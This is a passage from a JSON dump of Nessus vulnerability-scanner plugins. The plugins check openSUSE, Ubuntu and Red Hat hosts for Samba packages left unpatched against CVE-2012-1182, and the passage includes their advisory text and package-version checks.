attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-04/msg00036.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ldapsmb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-krb-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-krb-printing-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ldapsmb-1.34b-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb-devel-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb1-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb1-debuginfo-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbsharemodes-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbsharemodes0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbsharemodes0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtalloc-devel-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtalloc2-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtalloc2-debuginfo-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb-devel-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb1-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb1-debuginfo-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent-devel-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent0-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent0-debuginfo-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-client-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-client-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-debugsource-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-krb-printing-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-krb-printing-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-winbind-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-winbind-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libldb1-32bit-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libldb1-debuginfo-32bit-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtalloc2-32bit-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtalloc2-debuginfo-32bit-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtdb1-32bit-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtdb1-debuginfo-32bit-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtevent0-32bit-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtevent0-debuginfo-32bit-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-client-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-32bit-3.6.3-112.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ldapsmb / libldb-devel / libldb1 / libldb1-32bit / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:43", "description": "Brian Gorenc discovered that Samba incorrectly calculated array bounds when handling remote procedure calls (RPC) over the network. A remote, unauthenticated attacker could exploit this to execute arbitrary code as the root user. (CVE-2012-1182).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-13T00:00:00", "type": "nessus", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 : samba vulnerability (USN-1423-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-09-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:samba", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts"], "id": "UBUNTU_USN-1423-1.NASL", "href": "https://www.tenable.com/plugins/nessus/58743", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1423-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58743);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"USN\", value:\"1423-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 : samba vulnerability (USN-1423-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Brian Gorenc discovered that Samba incorrectly calculated array bounds\nwhen handling remote procedure calls (RPC) over the network. A remote,\nunauthenticated attacker could exploit this to execute arbitrary code\nas the root user. (CVE-2012-1182).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1423-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"samba\", pkgver:\"3.0.28a-1ubuntu4.18\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"samba\", pkgver:\"2:3.4.7~dfsg-1ubuntu3.9\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"samba\", pkgver:\"2:3.5.8~dfsg-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"samba\", pkgver:\"2:3.5.11~dfsg-1ubuntu2.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:56:22", "description": "Updated samba4 packages that fix one security issue, multiple bugs, and add various enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls. This could result in code generated by the PIDL compiler to not sufficiently protect against buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which provides a number of bug fixes and enhancements over the previous version. In particular, improved interoperability with Active Directory (AD) domains. SSSD now uses the libndr-krb5pac library to parse the Privilege Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity Management, which relies on the capabilities of the samba4 client library, is included as a Technology Preview. This functionality and server libraries, is included as a Technology Preview. This functionality uses the libndr-nbt library to prepare Connection-less Lightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security Authority (LSA) and Net Logon services to allow verification of trust from a Windows system. Because the Cross Realm Kerberos Trust functionality is considered a Technology Preview, selected samba4 components are considered to be a Technology Preview. For more information on which Samba packages are considered a Technology Preview, refer to Table 5.1, 'Samba4 Package Support' in the Release Notes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was rebooted, Winbind sometimes failed to reconnect when requested by 'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users using the wbinfo tool failed. This update applies upstream patches to fix this problem and now looking up a Security Identifier (SID) for a username, or a username for a given SID, works as expected after a domain controller is rebooted. (BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages, which fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat Enterprise Linux 6.4 and you have Samba in use, you should make sure that you uninstall the package named 'samba4' to avoid conflicts during the upgrade.", "cvss3": {"score": null, "vector": null}, "published": "2013-02-21T00:00:00", "type": "nessus", "title": "RHEL 6 : samba4 (RHSA-2013:0506)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:samba4", "p-cpe:/a:redhat:enterprise_linux:samba4-client", "p-cpe:/a:redhat:enterprise_linux:samba4-common", "p-cpe:/a:redhat:enterprise_linux:samba4-dc", "p-cpe:/a:redhat:enterprise_linux:samba4-dc-libs", "p-cpe:/a:redhat:enterprise_linux:samba4-debuginfo", "p-cpe:/a:redhat:enterprise_linux:samba4-devel", "p-cpe:/a:redhat:enterprise_linux:samba4-libs", "p-cpe:/a:redhat:enterprise_linux:samba4-pidl", "p-cpe:/a:redhat:enterprise_linux:samba4-python", "p-cpe:/a:redhat:enterprise_linux:samba4-swat", "p-cpe:/a:redhat:enterprise_linux:samba4-test", "p-cpe:/a:redhat:enterprise_linux:samba4-winbind", "p-cpe:/a:redhat:enterprise_linux:samba4-winbind-clients", "p-cpe:/a:redhat:enterprise_linux:samba4-winbind-krb5-locator", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2013-0506.NASL", "href": "https://www.tenable.com/plugins/nessus/64757", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0506. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64757);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0506\");\n\n script_name(english:\"RHEL 6 : samba4 (RHSA-2013:0506)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. (BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.\"\n );\n # https://access.redhat.com/knowledge/docs/en-US/Red_Hat_Enterprise_Linux/6/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b5caa05f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0506\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1182\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba4-common\");\n 